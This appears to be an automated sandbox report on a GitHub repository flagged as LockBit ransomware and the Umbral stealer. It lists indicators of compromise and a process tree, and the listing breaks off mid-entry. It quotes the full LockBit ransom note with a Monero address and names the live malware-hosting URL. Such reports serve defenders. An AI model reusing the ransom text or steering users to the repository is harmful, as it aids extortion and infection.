lockbit | hxxps://github[.]com/helloworld0000red/Ipgrabber/tags

Analysis

max time kernel
189s
max time network
193s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
13-02-2024 21:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/helloworld0000red/Ipgrabber/tags

Score

10^/10

lockbit umbral ransomware stealer

Malware Config

Extracted

Path

C:\I6xwb3fYM.README.txt

Family

lockbit

Ransom Note

~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~ >>>> Your data are stolen and encrypted The data will be published on TOR website if you do not pay the ransom pay 30$ in monero to 42LH7PpivEvh7sxTWdHqiHWppsC3sQNkA8bsbCxM8RuUC3RrFpYABaWaPs73WMWuccLiVhgLuizKh4h25LHaYpZNTLVzC1i >>>> What guarantees that we will not deceive you? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. Life is too short to be sad. Be not sad, money, it is only paper. If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. >>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION ID >>>> Your personal DECRYPTION ID: B7568014A48684D6D525F3F3722638C4 >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again! >>>> Advertisement

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000200000001e5ca-656.dat	family_umbral
behavioral1/memory/540-664-0x000001A402200000-0x000001A402240000-memory.dmp	family_umbral

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Renames multiple (643) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	8777.tmp

Executes dropped EXE 3 IoCs

pid	Process
540	Asset2.exe
4560	Assetloader antivm.exe
6636	8777.tmp

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3803511929-1339359695-2191195476-1000\desktop.ini	LB3.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3803511929-1339359695-2191195476-1000\desktop.ini	LB3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
82	raw.githubusercontent.com
83	raw.githubusercontent.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\spool\PRINTERS\00002.SPL	splwow64.exe
File created	C:\Windows\system32\spool\PRINTERS\PPf6b185pdcjab0losf4jexnide.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PPlhmsor_99d5rhuyysp1ipofic.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PPeuywcap6dgp919_m65vcmjlm.TMP	printfilterpipelinesvc.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\I6xwb3fYM.bmp"	LB3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\I6xwb3fYM.bmp"	LB3.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4560	Assetloader antivm.exe
4560	Assetloader antivm.exe
6636	8777.tmp

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Asset2.exe	AssetLoader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ONENOTE.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	ONENOTE.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.I6xwb3fYM	LB3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.I6xwb3fYM\ = "I6xwb3fYM"	LB3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\I6xwb3fYM\DefaultIcon	LB3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\I6xwb3fYM	LB3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\I6xwb3fYM\DefaultIcon\ = "C:\\ProgramData\\I6xwb3fYM.ico"	LB3.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	OpenWith.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 129735.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
6568	ONENOTE.EXE
6568	ONENOTE.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4824	msedge.exe
4824	msedge.exe
4300	msedge.exe
4300	msedge.exe
4520	identity_helper.exe
4520	identity_helper.exe
4124	msedge.exe
4124	msedge.exe
2572	msedge.exe
2572	msedge.exe
816	msedge.exe
816	msedge.exe
816	msedge.exe
816	msedge.exe
4804	powershell.exe
4804	powershell.exe
4804	powershell.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe
5108	LB3.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5984	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	540	Asset2.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	4560	Assetloader antivm.exe
Token: SeIncreaseQuotaPrivilege	888	wmic.exe
Token: SeSecurityPrivilege	888	wmic.exe
Token: SeTakeOwnershipPrivilege	888	wmic.exe
Token: SeLoadDriverPrivilege	888	wmic.exe
Token: SeSystemProfilePrivilege	888	wmic.exe
Token: SeSystemtimePrivilege	888	wmic.exe
Token: SeProfSingleProcessPrivilege	888	wmic.exe
Token: SeIncBasePriorityPrivilege	888	wmic.exe
Token: SeCreatePagefilePrivilege	888	wmic.exe
Token: SeBackupPrivilege	888	wmic.exe
Token: SeRestorePrivilege	888	wmic.exe
Token: SeShutdownPrivilege	888	wmic.exe
Token: SeDebugPrivilege	888	wmic.exe
Token: SeSystemEnvironmentPrivilege	888	wmic.exe
Token: SeRemoteShutdownPrivilege	888	wmic.exe
Token: SeUndockPrivilege	888	wmic.exe
Token: SeManageVolumePrivilege	888	wmic.exe
Token: 33	888	wmic.exe
Token: 34	888	wmic.exe
Token: 35	888	wmic.exe
Token: 36	888	wmic.exe
Token: SeIncreaseQuotaPrivilege	888	wmic.exe
Token: SeSecurityPrivilege	888	wmic.exe
Token: SeTakeOwnershipPrivilege	888	wmic.exe
Token: SeLoadDriverPrivilege	888	wmic.exe
Token: SeSystemProfilePrivilege	888	wmic.exe
Token: SeSystemtimePrivilege	888	wmic.exe
Token: SeProfSingleProcessPrivilege	888	wmic.exe
Token: SeIncBasePriorityPrivilege	888	wmic.exe
Token: SeCreatePagefilePrivilege	888	wmic.exe
Token: SeBackupPrivilege	888	wmic.exe
Token: SeRestorePrivilege	888	wmic.exe
Token: SeShutdownPrivilege	888	wmic.exe
Token: SeDebugPrivilege	888	wmic.exe
Token: SeSystemEnvironmentPrivilege	888	wmic.exe
Token: SeRemoteShutdownPrivilege	888	wmic.exe
Token: SeUndockPrivilege	888	wmic.exe
Token: SeManageVolumePrivilege	888	wmic.exe
Token: 33	888	wmic.exe
Token: 34	888	wmic.exe
Token: 35	888	wmic.exe
Token: 36	888	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	5108	LB3.exe
Token: SeBackupPrivilege	5108	LB3.exe
Token: SeDebugPrivilege	5108	LB3.exe
Token: 36	5108	LB3.exe
Token: SeImpersonatePrivilege	5108	LB3.exe
Token: SeIncBasePriorityPrivilege	5108	LB3.exe
Token: SeIncreaseQuotaPrivilege	5108	LB3.exe
Token: 33	5108	LB3.exe
Token: SeManageVolumePrivilege	5108	LB3.exe
Token: SeProfSingleProcessPrivilege	5108	LB3.exe
Token: SeRestorePrivilege	5108	LB3.exe
Token: SeSecurityPrivilege	5108	LB3.exe
Token: SeSystemProfilePrivilege	5108	LB3.exe
Token: SeTakeOwnershipPrivilege	5108	LB3.exe
Token: SeShutdownPrivilege	5108	LB3.exe
Token: SeDebugPrivilege	5108	LB3.exe
Token: SeBackupPrivilege	5108	LB3.exe
Token: SeBackupPrivilege	5108	LB3.exe
Token: SeSecurityPrivilege	5108	LB3.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe
4300	msedge.exe

Suspicious use of SetWindowsHookEx 35 IoCs

pid	Process
2192	OpenWith.exe
2192	OpenWith.exe
2192	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE
6568	ONENOTE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4300 wrote to memory of 2728	4300	msedge.exe	85
PID 4300 wrote to memory of 2728	4300	msedge.exe	85
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 3600	4300	msedge.exe	86
PID 4300 wrote to memory of 4824	4300	msedge.exe	87
PID 4300 wrote to memory of 4824	4300	msedge.exe	87
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88
PID 4300 wrote to memory of 3092	4300	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/helloworld0000red/Ipgrabber/tags
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa47146f8,0x7fffa4714708,0x7fffa4714718
  2⤵
  PID:2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
  2⤵
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:4712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:2968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5532 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5440 /prefetch:8
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5388 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:7228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
  2⤵
  PID:7380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
